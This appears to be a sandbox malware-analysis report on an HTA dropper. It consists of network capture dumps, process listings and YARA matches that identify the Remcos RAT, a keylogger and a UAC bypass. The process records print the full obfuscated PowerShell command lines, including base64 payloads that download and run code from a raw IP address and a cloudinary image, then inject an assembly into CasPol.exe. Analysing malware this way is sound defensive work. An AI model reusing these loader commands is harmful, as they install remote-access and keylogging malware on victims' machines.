                                                                                                          Data Ascii: D41gdNQXDy1AcN4WDs1gaNgWDm1AZNIWDg1gXNwVDa1AWNYVDU1gUNAVDO1ATNoUDI1gRNQUDC1AAN4TD80gONgTD20ANNITDw0gLNwSDq0AKNYSDk0gINASDe0AHNoRDY0gFNQRDS0AEN4QDM0gCNgQDG0ABNIQDAzg/MwPD6zA+MYPD0zg8MAPDuzA7MoODozg5MQODizA4M4NDczg2MgNDWzA1MINDQzgzMwMDKzAyMYMDEzgwMAID+yAvMo
                                                                                                          2024-12-11 10:23:29 UTC1369INData Raw: 5a 36 77 6c 4f 55 70 44 54 36 51 6b 4f 38 6f 44 4e 36 77 69 4f 6b 6f 44 48 36 51 68 4f 4d 6f 44 42 35 77 66 4f 30 6e 44 37 35 51 65 4f 63 6e 44 31 35 77 63 4f 45 6e 44 76 35 51 62 4f 73 6d 44 70 35 77 5a 4f 55 6d 44 6a 35 51 59 4f 38 6c 44 64 35 77 57 4f 6b 6c 44 58 35 51 56 4f 4d 6c 44 52 35 77 54 4f 30 6b 44 4c 35 51 53 4f 63 6b 44 46 35 77 51 4f 45 67 44 2f 34 51 50 4f 73 6a 44 35 34 77 4e 4f 55 6a 44 7a 34 51 4d 4f 38 69 44 74 34 51 45 4f 41 68 44 50 34 67 44 4f 30 67 44 4d 34 77 43 4f 6f 67 44 4a 34 41 43 4f 63 67 44 47 34 51 42 4f 51 67 44 41 33 77 2f 4e 34 66 44 39 33 41 2f 4e 73 66 44 36 33 51 2b 4e 67 66 44 33 33 67 39 4e 55 66 44 77 33 77 37 4e 34 65 44 74 33 41 37 4e 73 65 44 71 33 51 36 4e 67 65 44 6e 33 67 35 4e 55 65 44 6b 33 77 34 4e 49 65
                                                                                                          Data Ascii: Z6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj5QYO8lDd5wWOklDX5QVOMlDR5wTO0kDL5QSOckDF5wQOEgD/4QPOsjD54wNOUjDz4QMO8iDt4QEOAhDP4gDO0gDM4wCOogDJ4ACOcgDG4QBOQgDA3w/N4fD93A/NsfD63Q+NgfD33g9NUfDw3w7N4eDt3A7NseDq3Q6NgeDn3g5NUeDk3w4NIe
                                                                                                          2024-12-11 10:23:29 UTC1369INData Raw: 41 41 77 50 68 2f 54 49 2b 41 74 50 47 36 7a 4f 2b 49 54 50 47 33 54 76 39 41 55 50 33 77 44 74 38 6f 32 4f 7a 74 7a 41 36 34 63 4f 65 6e 7a 79 35 4d 55 4f 4e 67 54 4f 31 38 45 4e 31 54 44 68 7a 30 35 4d 38 4e 44 42 79 4d 75 4d 4e 4c 44 6c 79 34 53 4d 2f 48 54 31 78 77 47 4d 55 43 7a 52 41 41 41 41 51 42 51 42 41 41 77 50 4e 2f 7a 75 2f 49 6a 50 73 33 7a 34 36 59 69 4f 65 6f 6a 46 36 34 67 4f 48 67 6a 51 34 59 77 4e 30 66 6a 34 33 41 39 4e 2b 65 54 43 30 41 79 4d 68 50 7a 7a 7a 30 37 4d 72 4f 54 6d 7a 63 34 4d 31 4e 7a 59 7a 45 31 4d 2f 4d 54 4c 7a 73 78 4d 4a 49 54 78 79 45 72 4d 68 4a 6a 57 79 38 68 4d 4a 45 7a 31 78 73 63 4d 63 47 7a 6a 78 45 56 4d 77 45 6a 4a 78 4d 42 4d 70 44 44 34 77 6b 4e 4d 58 43 44 6b 77 59 46 4d 41 42 54 4b 77 49 43 41 41 41 41
                                                                                                          Data Ascii: AAwPh/TI+AtPG6zO+ITPG3Tv9AUP3wDt8o2OztzA64cOenzy5MUONgTO18EN1TDhz05M8NDByMuMNLDly4SM/HT1xwGMUCzRAAAAQBQBAAwPN/zu/IjPs3z46YiOeojF64gOHgjQ4YwN0fj43A9N+eTC0AyMhPzzz07MrOTmzc4M1NzYzE1M/MTLzsxMJITxyErMhJjWy8hMJEz1xscMcGzjxEVMwEjJxMBMpDD4wkNMXCDkwYFMABTKwICAAAA
                                                                                                          2024-12-11 10:23:29 UTC1369INData Raw: 30 31 4d 2b 4d 44 48 79 34 71 4d 4d 4b 44 66 79 63 6d 4d 64 46 44 76 78 63 61 4d 65 47 54 6b 78 59 59 4d 77 45 44 4b 78 4d 41 4d 37 44 54 7a 77 59 4d 4d 31 43 7a 71 77 45 4b 4d 61 43 7a 69 77 55 49 4d 2b 42 7a 63 41 41 41 41 30 42 41 42 41 43 67 50 33 37 44 37 2b 77 6f 50 30 34 6a 4c 2b 67 69 50 56 34 7a 42 39 38 66 50 6f 33 6a 33 39 4d 64 50 4e 33 44 79 39 4d 61 50 61 32 6a 64 39 34 57 50 76 30 7a 4a 38 59 4f 50 62 7a 44 69 38 49 49 50 62 77 7a 45 38 55 77 4f 39 76 44 39 37 73 2b 4f 6a 76 7a 32 37 4d 39 4f 49 76 6a 74 37 34 36 4f 69 75 6a 6d 37 45 35 4f 49 75 44 67 37 67 33 4f 77 74 44 61 37 73 31 4f 50 74 7a 52 37 6b 67 4f 64 72 54 73 36 6f 6f 4f 45 71 6a 66 36 67 6e 4f 77 70 44 62 36 45 6d 4f 53 70 6a 52 36 55 6a 4f 70 6f 7a 46 35 4d 66 4f 6b 6e 6a 31
                                                                                                          Data Ascii: 01M+MDHy4qMMKDfycmMdFDvxcaMeGTkxYYMwEDKxMAM7DTzwYMM1CzqwEKMaCziwUIM+BzcAAAA0BABACgP37D7+woP04jL+giPV4zB98fPo3j39MdPN3Dy9MaPa2jd94WPv0zJ8YOPbzDi8IIPbwzE8UwO9vD97s+Ojvz27M9OIvjt746Oiujm7E5OIuDg7g3OwtDa7s1OPtzR7kgOdrTs6ooOEqjf6gnOwpDb6EmOSpjR6UjOpozF5MfOknj1
                                                                                                          2024-12-11 10:23:29 UTC1369INData Raw: 78 4d 34 50 6a 34 79 34 71 4d 39 4a 6a 63 79 63 6c 4d 7a 49 7a 46 79 55 41 4d 66 44 54 77 77 4d 4b 4d 65 42 41 41 41 41 4c 41 45 41 43 41 41 41 77 50 30 39 7a 5a 2f 63 31 50 4b 35 6a 6b 2b 49 6c 50 41 35 7a 4d 2b 67 69 50 45 30 44 31 39 63 63 50 74 32 6a 51 39 49 77 4f 66 74 6a 53 35 30 45 4f 73 6a 6a 59 34 67 42 4f 44 63 54 71 33 59 6c 4e 4a 56 7a 61 31 67 55 4e 59 51 7a 42 41 41 41 41 45 42 41 42 51 41 41 41 41 67 7a 38 31 55 61 4e 49 57 6a 4e 30 41 39 4d 34 4b 7a 2b 79 49 73 4d 63 4b 44 59 78 4d 49 4d 52 43 44 59 41 41 41 41 6b 41 41 42 41 41 77 50 43 2f 54 66 2f 6f 6b 50 34 37 7a 79 2b 34 5a 50 73 33 7a 4e 39 63 77 4f 32 75 7a 62 37 51 78 4f 47 67 6a 7a 34 49 67 4e 74 4e 54 32 7a 6b 30 4d 6a 4d 6a 42 79 51 52 4d 75 41 41 41 41 51 44 41 44 41 50 41 2b
                                                                                                          Data Ascii: xM4Pj4y4qM9JjcyclMzIzFyUAMfDTwwMKMeBAAAALAEACAAAwP09zZ/c1PK5jk+IlPA5zM+giPE0D19ccPt2jQ9IwOftjS50EOsjjY4gBODcTq3YlNJVza1gUNYQzBAAAAEBABQAAAAgz81UaNIWjN0A9M4Kz+yIsMcKDYxMIMRCDYAAAAkAABAAwPC/Tf/okP47zy+4ZPs3zN9cwO2uzb7QxOGgjz4IgNtNT2zk0MjMjByQRMuAAAAQDADAPA+
                                                                                                          2024-12-11 10:23:29 UTC1369INData Raw: 4d 4a 44 7a 77 77 30 4c 4d 34 43 6a 73 77 77 4b 4d 6d 43 54 6f 77 73 4a 4d 56 43 7a 6a 77 6f 49 4d 45 43 6a 66 77 67 48 4d 7a 42 54 62 77 63 47 4d 68 42 44 58 77 59 46 4d 51 42 6a 53 77 55 45 4d 2f 41 54 4f 77 4d 44 4d 75 41 44 4b 77 49 43 4d 63 41 7a 46 77 45 42 4d 4c 41 54 42 77 41 41 41 41 41 41 33 41 4d 41 55 41 38 6a 2b 2f 51 2f 50 75 2f 54 36 2f 4d 2b 50 64 2f 7a 31 2f 49 39 50 4d 2f 6a 78 2f 41 38 50 37 2b 54 74 2f 38 36 50 70 2b 44 70 2f 34 35 50 59 2b 6a 6b 2f 30 34 50 48 2b 54 67 2f 73 33 50 32 39 44 63 2f 6f 32 50 6b 39 7a 58 2f 6b 31 50 54 39 54 54 2f 67 30 50 43 39 44 50 2f 59 7a 50 78 38 7a 4b 2f 55 79 50 66 38 6a 47 2f 51 78 50 4f 38 44 43 2f 4d 67 50 39 37 7a 39 2b 45 76 50 73 37 6a 35 2b 41 75 50 61 37 54 31 2b 38 73 50 4a 37 7a 77 2b 34
                                                                                                          Data Ascii: MJDzww0LM4CjswwKMmCTowsJMVCzjwoIMECjfwgHMzBTbwcGMhBDXwYFMQBjSwUEM/ATOwMDMuADKwICMcAzFwEBMLATBwAAAAAA3AMAUA8j+/Q/Pu/T6/M+Pd/z1/I9PM/jx/A8P7+Tt/86Pp+Dp/45PY+jk/04PH+Tg/s3P29Dc/o2Pk9zX/k1PT9TT/g0PC9DP/YzPx8zK/UyPf8jG/QxPO8DC/MgP97z9+EvPs7j5+AuPa7T1+8sPJ7zw+4


                                                                                                          Click to jump to process

                                                                                                          Click to jump to process

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Click to jump to process

                                                                                                          Target ID:0
                                                                                                          Start time:05:22:55
                                                                                                          Start date:11/12/2024
                                                                                                          Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:mshta.exe "C:\Users\user\Desktop\nicegirlforyou.hta"
                                                                                                          Imagebase:0x7f0000
                                                                                                          File size:13'312 bytes
                                                                                                          MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:true

                                                                                                          Target ID:1
                                                                                                          Start time:05:22:56
                                                                                                          Start date:11/12/2024
                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\system32\cmd.exe" "/c poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))"
                                                                                                          Imagebase:0x1c0000
                                                                                                          File size:236'544 bytes
                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:2
                                                                                                          Start time:05:22:56
                                                                                                          Start date:11/12/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff66e660000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:3
                                                                                                          Start time:05:22:56
                                                                                                          Start date:11/12/2024
                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))"
                                                                                                          Imagebase:0xa00000
                                                                                                          File size:433'152 bytes
                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:4
                                                                                                          Start time:05:22:58
                                                                                                          Start date:11/12/2024
                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.cmdline"
                                                                                                          Imagebase:0x660000
                                                                                                          File size:2'141'552 bytes
                                                                                                          MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:true

                                                                                                          Target ID:5
                                                                                                          Start time:05:22:59
                                                                                                          Start date:11/12/2024
                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFAE8.tmp" "c:\Users\user\AppData\Local\Temp\gxlowwdn\CSC56436D359159402F8D448B12D32335C6.TMP"
                                                                                                          Imagebase:0x5b0000
                                                                                                          File size:46'832 bytes
                                                                                                          MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:true

                                                                                                          Target ID:7
                                                                                                          Start time:05:23:05
                                                                                                          Start date:11/12/2024
                                                                                                          Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sheismygirlwholovedmealotstillalsoshelovesmetruly.vbs"
                                                                                                          Imagebase:0x170000
                                                                                                          File size:147'456 bytes
                                                                                                          MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:8
                                                                                                          Start time:05:23:05
                                                                                                          Start date:11/12/2024
                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals
                                                                                                          Imagebase:0xa00000
                                                                                                          File size:433'152 bytes
                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:9
                                                                                                          Start time:05:23:05
                                                                                                          Start date:11/12/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff66e660000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:false

                                                                                                          Target ID:11
                                                                                                          Start time:05:23:29
                                                                                                          Start date:11/12/2024
                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                                          Imagebase:0xd90000
                                                                                                          File size:108'664 bytes
                                                                                                          MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.4536165624.0000000001348000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Has exited:false

                                                                                                          Reset < >
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000003.2095377300.0000000006D20000.00000010.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_3_6d20000_mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                            • Instruction ID: 584c959390527fe76faf378fba2fe1054c4a9e4e398bcdefa3cafd6d8eb5a651
                                                                                                            • Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                            • Instruction Fuzzy Hash:
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000003.2095377300.0000000006D20000.00000010.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_3_6d20000_mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                            • Instruction ID: 584c959390527fe76faf378fba2fe1054c4a9e4e398bcdefa3cafd6d8eb5a651
                                                                                                            • Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                            • Instruction Fuzzy Hash:

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:4.6%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:10.8%
                                                                                                            Total number of Nodes:74
                                                                                                            Total number of Limit Nodes:9
